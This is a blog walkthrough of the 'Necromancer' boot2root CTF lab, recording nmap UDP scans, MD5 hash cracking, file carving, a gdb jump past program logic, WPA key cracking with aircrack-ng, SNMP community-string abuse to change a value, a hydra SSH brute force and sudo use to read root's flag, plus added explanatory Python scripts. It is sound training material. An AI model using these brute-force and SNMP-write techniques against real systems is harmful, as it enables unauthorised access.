30 March 2023

Pentesting Fun Stuff

following the cyber security path…

The Necromancer: 1




The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition.
There are 11 flags to collect on your way to solving the challenge, and the difficulty level is considered beginner.
The end goal is simple… destroy The Necromancer!


I started out with a simple nmap scan, but it came back empty: all ports were filtered. I tried another, more intensive scan. Still nothing. Because I had focused mainly on the TCP ports, I did another scan, this time focused on the UDP ports.

└──╼ $sudo nmap -v -A -T4 -sU -Pn -p 1-1000
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-05 07:53 CEST
Not shown: 1000 filtered ports, 999 open|filtered ports
666/udp closed doom
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP phone
Running: Cisco embedded OS
CPE: cpe:/h:cisco:unified_ip_phone_7912
OS details: Cisco IP Phone 7912-series
Network Distance: 1 hop

I got one hit, and that port was closed. But it was more information than before. According to the scan, the service on that port was a Cisco VoIP phone. I tried another UDP scan, this time aimed only at port 666. This time it was open.

└──╼ $sudo nmap -A -T4 -sU -Pn -p-
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-05 07:18 CEST
Nmap scan report for
Host is up (0.00040s latency).
666/udp open doom?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
1 0.40 ms
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.25 seconds

There is some output from the nmap scan: “You gasp for air! Time is running out!”. When I tried to connect to the port using netcat, the connection timed out. All other options gave similar results; a connection just wouldn’t happen. Because this looked like a hopeless case and I needed to know what was happening, I fired up Wireshark.


After capturing some packets I could see that the VM was doing ARP requests to every IP address in the subnet. After a while there was a SYN coming from the VM to an IP on port 4444. This occurred several times, at different IP addresses. Let’s try and connect through port 4444.

Secret message

└──╼ $sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 49014

After some waiting I got a connection and received some sort of code. It looked like base64 to me, so I tried to decode it.

You find yourself staring towards the horizon, with nothing but silence surrounding you. You look east, then south, then west, all you can see is a great wasteland of nothingness.
Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.
The air around you begins to get thicker, and your heart begins to beat against your chest. You turn to your left.. then to your right! You are trapped!
You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.
As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.
You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.
You open the box, and find a parchment with the following written on it. “Chant the string of flag1 – u666”

Nice. The first flag is in. The string looks like an MD5 hash.

└──╼ $findmyhash MD5 -h e6078b9b1aac915d11b9fd59791030bf
***** HASH CRACKED!! *****
The original string is: opensesame
The following hashes were cracked:
e6078b9b1aac915d11b9fd59791030bf -> opensesame

Open sesame

Time to follow the instructions: “Chant the string of flag1”. Now that I know what the string is, I can chant away.

└──╼ $sudo nc -nv -u 666
(UNKNOWN) [] 666 (?) open

A loud crack of thunder sounds as you are knocked to your feet!
Dazed, you start to feel fresh air entering your lungs.
You are free!
In front of you written in the sand are the words:
As you stand to your feet you notice that you can no longer see the flicker of light in the distance.
You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.
As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.
The birds get closer, and closer, and closer.
Staring up at the crows you can see they are in a formation.
Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.
As quickly as the birds appeared, they have left you once again…. alone… tortured by the deafening sound of silence.
666 is closed.
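The “chant at u666” step above (and the later chants at u31337 and u777) is just a UDP exchange: one datagram carrying the word, then whatever the box sends back until the link goes quiet. The following Python script is an added example, not part of the write-up or the box; it pairs a generic UDP `chant()` client with a constructed mock “oracle” bound on loopback, so the exchange can be exercised offline. The reply text is a shortened version of the box’s message, and the “Nothing happens.” reply for a wrong or empty chant is constructed (the real box simply stays silent), which is what an empty line sent by a misconfigured netcat session would get.

```python
import socket
import threading

# Constructed stand-in for the box: what it sends back when the right word is chanted.
EXPECTED_CHANT = "opensesame"
SUCCESS_LINES = [
    "A loud crack of thunder sounds as you are knocked to your feet!\n",
    "You are free!\n",
    "666 is closed.\n",
]
FAILURE_LINES = ["Nothing happens.\n"]  # constructed; the real box gives no reply at all


def start_mock_oracle(expected=EXPECTED_CHANT, success=SUCCESS_LINES, failure=FAILURE_LINES):
    """Bind a UDP socket on a random loopback port and answer chants from a background thread.
    Returns (port, stop_event); set stop_event to shut the thread down."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("127.0.0.1", 0))
    sock.settimeout(0.2)  # wake up periodically to check the stop flag
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                data, addr = sock.recvfrom(4096)
            except OSError:  # socket.timeout is an OSError subclass
                continue
            word = data.decode("utf-8", errors="replace").strip()
            for line in (success if word == expected else failure):
                sock.sendto(line.encode(), addr)
        sock.close()

    threading.Thread(target=serve, daemon=True).start()
    return sock.getsockname()[1], stop


def chant(host, port, word, timeout=0.5):
    """Send one datagram carrying `word` (newline-terminated, as netcat would) and
    collect every reply datagram until nothing arrives for `timeout` seconds."""
    replies = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto((word + "\n").encode(), (host, port))
        while True:
            try:
                data, _ = s.recvfrom(65535)
            except OSError:  # timeout (or ICMP unreachable on a connected socket)
                break
            replies.append(data.decode("utf-8", errors="replace"))
    return "".join(replies)


if __name__ == "__main__":
    port, stop = start_mock_oracle()
    try:
        print(chant("127.0.0.1", port, "opensesame"))
        print(chant("127.0.0.1", port, ""))  # the empty-answer case from later in the write-up
    finally:
        stop.set()
```

Because UDP has no connection, `chant()` cannot tell “wrong word” from “port closed” except by silence, which is why the timeout is the only way to end the read loop; on a real target you would raise it well above 0.5 s.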

Alright. I got flag number 2 and a hint that port 80 might be open. First, let’s check what the original string of flag 2 looks like.

└──╼ $findmyhash MD5 -h c39cd4df8f2e35d20d92c2e44de5f7c6
Cracking hash: c39cd4df8f2e35d20d92c2e44de5f7c6
***** HASH CRACKED!! *****
The original string is: 1033750779
The following hashes were cracked:
c39cd4df8f2e35d20d92c2e44de5f7c6 -> 1033750779

Port 80

Hours have passed since you first started to follow the crows.
Silence continues to engulf you as you treck towards a mountain range on the horizon.
More times passes and you are now standing in front of a great chasm.
Across the chasm you can see a necromancer standing in the mouth of a cave, staring skyward at the circling crows.
As you step closer to the chasm, a rock dislodges from beneath your feet and falls into the dark depths.
The necromancer looks towards you with hollow eyes which can only be described as death.
He smirks in your direction, and suddenly a bright light momentarily blinds you.
The silence is broken by a blood curdling screech of a thousand birds, followed by the necromancers laughs fading as he decends into the cave!
The crows break their formation, some flying aimlessly in the air; others now motionless upon the ground.
The cave is now protected by a gaseous blue haze, and an organised pile of feathers lay before you.

After trying a few options, such as brute-forcing possible pages and files with dirb and making a word list from the site with cewl (none of which gave any result), I turned to the picture. There was nothing useful in the EXIF data, but when I used hexdump I got another clue: it seemed there was a text file embedded within the picture.

└──╼ $foremost -i /home/n13mant/CTF/necromancer/pileoffeathers.jpg -T
Processing: /home/n13mant/CTF/necromancer/pileoffeathers.jpg

There was another base64-encoded string inside the text file.

└──╼ $echo 'ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ' | base64 -d
flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm
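Every flag on this box follows the same loop: decode a base64 message, pull out the `flagN{<md5>}` token, then check the digest against a word list (what findmyhash did for flag 1 and flag 2). The script below is an added example, not the author’s code; it folds those three steps together and also handles the edge case that bit this particular step: the string carved out of the JPEG has no `=` padding, and Python’s `base64.b64decode()` (like strict decoders) rejects that unless the padding is restored. The word list is a constructed four-entry stand-in; a real run would point at rockyou.txt or similar.

```python
import base64
import binascii
import hashlib
import re

# Flags on this box look like flagN{<32 hex chars>}; the hex part is an MD5 digest.
FLAG_RE = re.compile(r"flag(\d+)\{([0-9a-f]{32})\}")


def b64decode_lenient(text):
    """Decode base64 that may arrive without '=' padding or with stray whitespace.
    Returns the decoded text, or None if the input is not base64 at all."""
    compact = "".join(text.split())
    compact += "=" * (-len(compact) % 4)  # restore the padding the carve lost
    try:
        return base64.b64decode(compact).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def extract_flags(message):
    """Return [(flag_number, md5_hex), ...] for every flag token in a decoded message."""
    return [(int(n), h) for n, h in FLAG_RE.findall(message)]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def crack_md5(target_hex, candidates):
    """Offline dictionary check: the candidate whose MD5 equals target_hex, else None."""
    target_hex = target_hex.lower()
    for word in candidates:
        if md5_hex(word) == target_hex:
            return word
    return None


def solve(b64_message, wordlist):
    """Decode, extract, and dictionary-check; returns [(flag_no, md5_hex, plaintext_or_None)]."""
    decoded = b64decode_lenient(b64_message)
    if decoded is None:
        return []
    return [(n, h, crack_md5(h, wordlist)) for n, h in extract_flags(decoded)]


# Sample input: the unpadded base64 blob carved from pileoffeathers.jpg, as shown in the
# write-up, plus a constructed toy word list standing in for a real dictionary.
FLAG3_B64 = ("ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3Mg"
             "dGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ")
TOY_WORDLIST = ["password", "opensesame", "blackmagic", "demonslayer"]


if __name__ == "__main__":
    print(b64decode_lenient(FLAG3_B64))
    for flag_no, digest, plain in solve(FLAG3_B64, TOY_WORDLIST):
        print(f"flag{flag_no}: {digest} -> {plain or 'not in word list'}")
```

The dictionary check is deliberately a plain loop over candidates: unsalted MD5 is cheap enough that a word list of millions of entries completes in seconds, which is the whole reason the box can hand out flags as bare MD5 digests and still expect them to be recovered.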

Alright. Flag 3 and a way to move forward.

Across the chasm


You cautiously make your way across chasm.
You are standing on a snow covered plateau, surrounded by shear cliffs of ice and stone.
The cave before you is protected by some sort of spell cast by the necromancer.
You reach out to touch the gaseous blue haze, and can feel life being drawn from your soul the closer you get.
Hastily you take a few steps back away from the cave entrance.
There must be a magical item that could protect you from the necromancer’s spell.

Magical item

I racked my brain on this one. Checked out the picture… nothing. Checked out the source code and HTML headers… nothing. Tried to brute-force possible pages or files with dirb… nothing. So the answer had to be inside the text; there had to be something there that would help me with the next piece of the puzzle. After a while I found a sentence with an ambiguous choice of words: “There must be a magical item that could protect you from the necromancer’s spell.” When I searched Google for alternative words for “magical item”, I got a long list of possibilities. So there was logic in my thinking. Too bad none of them were another page, but it gave me the idea to build a word list from these words and give dirb another chance.

└──╼ $cewl -d 2 -m 5 "http://www.macmillandictionary.com/thesaurus-category/british/magical-objects-and-potions-and-lucky-charms" -w magic.dic
└──╼ $dirb /home/n13mant/CTF/necromancer/magic.dic
---- Scanning URL: ----
+ (CODE:200|SIZE:9676)

Requesting that page gave me an executable.

└──╼ $strings talisman

Some of the function names look interesting.

└──╼ $gdb talisman
(gdb) info functions
All defined functions:
Non-debugging symbols:
0x080482d0 _init
0x08048310 printf@plt
0x08048320 __libc_start_main@plt
0x08048330 __isoc99_scanf@plt
0x08048350 _start
0x08048380 __x86.get_pc_thunk.bx
0x08048390 deregister_tm_clones
0x080483c0 register_tm_clones
0x08048400 __do_global_dtors_aux
0x08048420 frame_dummy
0x0804844b unhide
0x0804849d hide
0x080484f4 myPrintf
0x08048529 wearTalisman
0x08048a13 main
0x08048a37 chantToBreakSpell
0x08049530 __libc_csu_init
0x08049590 __libc_csu_fini
0x08049594 _fini
(gdb) break wearTalisman
Breakpoint 1 at 0x804852d
(gdb) run
Starting program: /home/n13mant/CTF/necromancer/talisman
Breakpoint 1, 0x0804852d in wearTalisman ()
(gdb) jump chantToBreakSpell
Continuing at 0x8048a3b.
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337
[Inferior 1 (process 9050) exited normally]

Nice. Another flag and a way to move forward.

└──╼ $findmyhash MD5 -h ea50536158db50247e110a6c89fcf3d3
Cracking hash: ea50536158db50247e110a6c89fcf3d3
Analyzing with my-addr (http://md5.my-addr.com)...
***** HASH CRACKED!! *****
The original string is: blackmagic
The following hashes were cracked:
ea50536158db50247e110a6c89fcf3d3 -> blackmagic


└──╼ $nc -nv -u 31337
(UNKNOWN) [] 31337 (?) open

As you chant the words, a hissing sound echoes from the ice walls.
The blue aura disappears from the cave entrance.
You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.
You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.
The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.
Suddenly, you are attacked by a swarm of bats!
You aimlessly thrash at the air in front of you!
The bats continue their relentless attack, until…. silence.
Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.
Looking towards one of the torches, you see something on the cave wall.
You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.

The necromancer

You continue to make your way through the cave.
In the distance you can see a familiar flicker of light moving in and out of the shadows.
As you get closer to the light you can hear faint footsteps, followed by the sound of a heavy door opening.
You move closer, and then stop frozen with fear.
It’s the necromancer!


Again he stares at you with deathly hollow eyes.
He is standing in a doorway; a staff in one hand, and an object in the other.
Smirking, the necromancer holds the staff and the object in the air.
He points his staff in your direction, and the stench of death and decay begins to fill the air.
You stare into his eyes and then…….
…… darkness. You open your eyes and find yourself lying on the damp floor of the cave.
The amulet must have saved you from whatever spell the necromancer had cast.
You stand to your feet. Behind you, only darkness.
Before you, a large door with the symbol of a skull engraved into the surface.
Looking closer at the skull, you can see u161 engraved into the forehead.

There is a link for obtaining another file. I downloaded the file and thought about what u161 could mean. With the previous hints I connected to the given port, so in this case I think I also need to connect to UDP port 161. But I think I need another ‘magic’ word to chant. The hash of flag 5 cracks to ‘809472671’. The hash from flag 6 I couldn’t crack.


The file was compressed; after decompressing it I got a tcpdump capture, which I opened in Wireshark. The traffic consisted only of 802.11 (legacy WiFi) frames. The only problem was that it was all encrypted. In this case I relied on aircrack-ng to brute-force the needed password.

KEY FOUND! [ death2all ]

Now that I have the secret key I can read the traffic in Wireshark.
When I went over the file there was nothing that really looked interesting. There was, however, one thing that stood out among the rest: the communication between a Samsung device and a D-Link router.

wlan.addr == f4:7b:5e:ef:3b:1e

The only thing that was remotely name-like was the SSID the router was broadcasting: ‘community’. OK. So I have a hint about connecting to UDP port 161, which is the SNMP port. I have a password that decrypts WiFi traffic, only to show information about an SSID called ‘community’. With SNMP there is an SNMP read-only community string that works like a password.
The door is ‘Locked’ and to defeat the necromancer I must ‘Unlock’ the door. So I still need to work with SNMP. Let’s try to change the Location from ‘Locked’ to ‘Unlocked’. The problem is that I don’t have the right OID, so I need to run another tool. I didn’t have it installed, but for this I’ll use snmpwalk (for which I need to install snmp).

└──╼ $sudo snmpwalk -v1 -c death2all
iso. = STRING: "You stand in front of a door."
iso. = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso. = STRING: "Fear the Necromancer!"
iso. = STRING: "Locked - death2allrw!"
End of MIB
└──╼ $sudo snmpset -v1 -c death2allrw iso. s Unlocked
iso. = STRING: "Unlocked"
└──╼ $sudo snmpwalk -v1 -c death2all
iso. = STRING: "You stand in front of a door."
iso. = STRING: "The door is unlocked! You may now enter the Necromancer's lair!"
iso. = STRING: "Fear the Necromancer!"
iso. = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"
End of MIB
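The two things that make the SNMP step work are visible in the datagrams themselves: SNMPv1/v2c carries the community string in cleartext, and here the read-only walk returns a MIB value that spells out the read-write community. The script below is an added example (not the author’s code and not from any SNMP library) that hand-encodes and parses SNMPv1 GetRequest/SetRequest messages with BER, so you can see exactly what `snmpwalk -c death2all` and `snmpset -c death2allrw ... s Unlocked` put on the wire. The write-up strips the box’s OIDs to `iso.`, so the standard sysLocation.0 OID (1.3.6.1.2.1.1.6.0) is used as a stand-in; the code only builds and parses bytes and sends nothing.

```python
# Minimal SNMPv1 (RFC 1157) BER encoder/decoder; constructed example, builds/parses datagrams only.
GET_REQUEST, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA2, 0xA3
SYS_LOCATION_0 = "1.3.6.1.2.1.1.6.0"  # standard sysLocation.0; the box's real OIDs are not in the write-up


def ber_len(n):
    """BER length octets: short form below 128, long form (0x8N + N bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, content):
    return bytes([tag]) + ber_len(len(content)) + content


def ber_int(n):
    """INTEGER as minimal big-endian two's complement (non-negative values only, enough for SNMPv1)."""
    if n == 0:
        return tlv(0x02, b"\x00")
    return tlv(0x02, n.to_bytes((n.bit_length() + 8) // 8, "big"))  # +8 keeps a leading 0x00 when needed


def ber_str(s):
    return tlv(0x04, s.encode("latin-1"))


def ber_null():
    return tlv(0x05, b"")


def ber_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, remaining arcs base-128 with continuation bits."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def build_message(pdu_tag, community, request_id, varbinds):
    """Message ::= SEQUENCE { version INTEGER(0), community OCTET STRING, PDU }; varbinds = [(oid, encoded_value)]."""
    vbl = b"".join(tlv(0x30, ber_oid(oid) + value) for oid, value in varbinds)
    pdu = tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, vbl))
    return tlv(0x30, ber_int(0) + ber_str(community) + pdu)  # community goes out in the clear


def read_tlv(buf, pos):
    tag, pos = buf[pos], pos + 1
    length, pos = buf[pos], pos + 1
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(body):
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def decode_value(tag, body):
    if tag == 0x02:
        return int.from_bytes(body, "big", signed=True)
    if tag == 0x04:
        return body.decode("latin-1")
    if tag == 0x05:
        return None
    if tag == 0x06:
        return decode_oid(body)
    return body  # Counter/Gauge/TimeTicks etc. left raw


def parse_message(data):
    """Parse one SNMPv1 datagram (request or GetResponse) into a dict."""
    _, msg, _ = read_tlv(data, 0)
    _, version, p = read_tlv(msg, 0)
    _, community, p = read_tlv(msg, p)
    pdu_tag, pdu, _ = read_tlv(msg, p)
    _, request_id, q = read_tlv(pdu, 0)
    _, _, q = read_tlv(pdu, q)  # error-status
    _, _, q = read_tlv(pdu, q)  # error-index
    _, vbl, _ = read_tlv(pdu, q)
    varbinds, r = [], 0
    while r < len(vbl):
        _, vb, r = read_tlv(vbl, r)
        _, oid_body, s = read_tlv(vb, 0)
        vtag, vbody, _ = read_tlv(vb, s)
        varbinds.append((decode_oid(oid_body), decode_value(vtag, vbody)))
    return {"version": int.from_bytes(version, "big", signed=True),
            "community": community.decode("latin-1"), "pdu_tag": pdu_tag,
            "request_id": int.from_bytes(request_id, "big", signed=True), "varbinds": varbinds}


if __name__ == "__main__":
    get = build_message(GET_REQUEST, "death2all", 1, [(SYS_LOCATION_0, ber_null())])
    put = build_message(SET_REQUEST, "death2allrw", 2, [(SYS_LOCATION_0, ber_str("Unlocked"))])
    for name, pkt in ("GetRequest", get), ("SetRequest", put):
        print(name, pkt.hex(), parse_message(pkt))
```

Running it shows the community string as plain ASCII inside the hex, which is why a Wireshark capture of SNMPv1/v2c traffic hands the strings to anyone on the path, and why a monitoring sensor that parses these PDUs can alert on a SetRequest (tag 0xA3) or on a read-write community appearing on the wire at all. The lasting fix on the defending side is SNMPv3 with authentication and privacy, and never storing one community string inside a value readable with another.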

Entering the lair of the beast

After this I finally got my 7th flag, which cracked to ‘demonslayer’, and a clue on where to look next: I may enter the necromancer’s lair on port 22. So the username will probably be ‘necromancer’ and the password the cracked hash from flag 7. But that wasn’t the case. I tried different combinations, but was getting nowhere.

└──╼ $sudo hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-05 15:20:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: login: demonslayer password: 12345678

After I entered the lair of the beast I looked for something to hold on to.

└──╼ $ ssh demonslayer@ -p 22
demonslayer@'s password:
$ ls -lah
total 40
drwxr-xr-x 3 demonslayer demonslayer 512B Jun 23 05:38 .
drwxr-xr-x 3 root wheel 512B May 11 18:25 ..
-rw-r--r-- 1 demonslayer demonslayer 87B May 11 18:25 .Xdefaults
-rw-r--r-- 1 demonslayer demonslayer 773B May 11 18:25 .cshrc
-rw-r--r-- 1 demonslayer demonslayer 103B May 11 18:25 .cvsrc
-rw-r--r-- 1 demonslayer demonslayer 359B May 11 18:25 .login
-rw-r--r-- 1 demonslayer demonslayer 175B May 11 18:25 .mailrc
-rw-r--r-- 1 demonslayer demonslayer 218B May 11 18:25 .profile
drwx------ 2 demonslayer demonslayer 512B May 11 18:25 .ssh
-rw-r--r-- 1 demonslayer demonslayer 706B May 11 21:19 flag8.txt
$ cat flag8.txt

You enter the Necromancer’s Lair!
A stench of decay fills this place.
Jars filled with parts of creatures litter the bookshelves.
A fire with flames of green burns coldly in the distance.
Standing in the middle of the room with his back to you is the Necromancer.
In front of him lies a corpse, indistinguishable from any living creature you have seen before.
He holds a staff in one hand, and the flickering object in the other.
“You are a fool to follow me here! Do you not know who I am!”
The necromancer turns to face you. Dark words fill the air!
“You are damned already my friend. Now prepare for your own death!”
Defend yourself! Counter attack the Necromancer’s spells at u777!

Fighting the beast!

Here in the lair of the beast I need to fight him as instructed.

$ nc -nv -u 777
Connection to 777 port [udp/*] succeeded!

** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 2 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 1 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 0 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?
!!!!!!! You have been defeated by The Necromancer! (*_*) !!!!!!!

Without having the opportunity to give a proper answer, the connection is closed and I’m knocked out of the lair. I guess the knockdown was so hard that I need to start over from scratch: after trying to get back on my feet, it seems the whole VM has gone back to its initial state!!!! This isn’t just a troll… it’s a mental breakdown.
After repeating the whole process I’m back at the lair to face the necromancer. After checking my notes I see the error of my ways: when using netcat I also used the options -nv, which ran through the script giving empty answers.

$ nc -u 777
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path? Kelewan
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Who did Johann Faust VIII make a deal with? Mephistopheles
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Who is tricked into passing the Ninth Gate? Hedge

A great flash of light knocks you to the ground; momentarily blinding you!
As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.
An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.
The room is silent.
You walk over to where the Necromancer once stood.
On the ground is a small vile.

I hoped to get some information from the cracked hashes, but that wasn’t so.
flag 8: Kelewan
flag 9: Mephistopheles
flag 10: Hedge

$ ls -lah
total 44
drwxr-xr-x 3 demonslayer demonslayer 512B Sep 6 02:45 .
drwxr-xr-x 3 root wheel 512B May 11 18:25 ..
-rw-r--r-- 1 demonslayer demonslayer 87B May 11 18:25 .Xdefaults
-rw-r--r-- 1 demonslayer demonslayer 773B May 11 18:25 .cshrc
-rw-r--r-- 1 demonslayer demonslayer 103B May 11 18:25 .cvsrc
-rw-r--r-- 1 demonslayer demonslayer 359B May 11 18:25 .login
-rw-r--r-- 1 demonslayer demonslayer 175B May 11 18:25 .mailrc
-rw-r--r-- 1 demonslayer demonslayer 218B May 11 18:25 .profile
-rw-r--r-- 1 demonslayer demonslayer 196B Sep 6 02:37 .smallvile
drwx------ 2 demonslayer demonslayer 512B May 11 18:25 .ssh
-rw-r--r-- 1 demonslayer demonslayer 706B May 11 21:19 flag8.txt

When looking at my notes I saw a small difference compared to before. There was a hidden file which wasn’t there before the battle: the small vile on the ground.

$ cat .smallvile

You pick up the small vile.
Inside of it you can see a green liquid.
Opening the vile releases a pleasant odour into the air.
You drink the elixir and feel a great power within your veins!

With great power comes great responsibility

To see what great power has been bestowed upon me, I use sudo -l.

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
User demonslayer may run the following commands on thenecromancer:
 (ALL) NOPASSWD: /bin/cat /root/flag11.txt
$ sudo cat /root/flag11.txt
Suddenly you feel dizzy and fall to the ground!
As you open your eyes you find yourself staring at a computer screen.
Congratulations!!! You have conquered......


 by @xerubus
Big shout out to Dook and Bull for being test bunnies.
Cheers OJ for the obfuscation help.
Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.
" xerubus (@xerubus) - www.mogozobo.com "


As themed boot2roots go, this was one of the most awesome I have ever done!
This b2r was filled with a good range of different challenges.
Excellent work by the people who created this masterpiece.